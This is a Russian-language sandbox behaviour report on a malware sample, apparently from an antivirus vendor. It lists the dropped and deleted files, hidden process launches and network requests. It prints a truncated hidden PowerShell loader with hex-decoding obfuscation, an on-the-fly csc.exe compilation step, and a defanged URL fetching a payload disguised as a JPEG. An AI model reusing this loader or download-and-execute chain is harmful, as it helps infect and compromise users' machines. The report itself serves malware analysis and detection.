Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function r1215f5 {param($ba7742)$be7e8='ve1eb6';$dcbb415='';for ($i=0; $i -lt $ba7742.length;$i+=2){$fadd8=[convert]::ToByte($ba7742.Substring($i,2),16);$dcbb415+=[char]($...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\orhcaaxd.0.cs
- %TEMP%\orhcaaxd.cmdline
- %TEMP%\orhcaaxd.out
- %TEMP%\cscb529.tmp
- %TEMP%\resb539.tmp
- %TEMP%\orhcaaxd.dll
- %APPDATA%\nc976.exe
- %TEMP%\qiha.pngc\qiha.png
- %TEMP%\qiha.pngc\qihalxm.exe
- %TEMP%\qiha.pngc.lnk
Удаляет следующие файлы
- %TEMP%\resb539.tmp
- %TEMP%\cscb529.tmp
- %TEMP%\orhcaaxd.out
- %TEMP%\orhcaaxd.pdb
- %TEMP%\orhcaaxd.0.cs
- %TEMP%\orhcaaxd.cmdline
- %TEMP%\orhcaaxd.dll
Сетевая активность
TCP
Запросы HTTP GET
- http://10#.#89.10.150/ui/106779.jpg
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- '%APPDATA%\nc976.exe'
- '%TEMP%\qiha.pngc\qihalxm.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function r1215f5 {param($ba7742)$be7e8='ve1eb6';$dcbb415='';for ($i=0; $i -lt $ba7742.length;$i+=2){$fadd8=[convert]::ToByte($ba7742.Substring($i,2),16);$dcbb415+=[char]($...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\orhcaaxd.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB539.tmp" "%TEMP%\CSCB529.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\orhcaaxd.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB539.tmp" "%TEMP%\CSCB529.tmp"
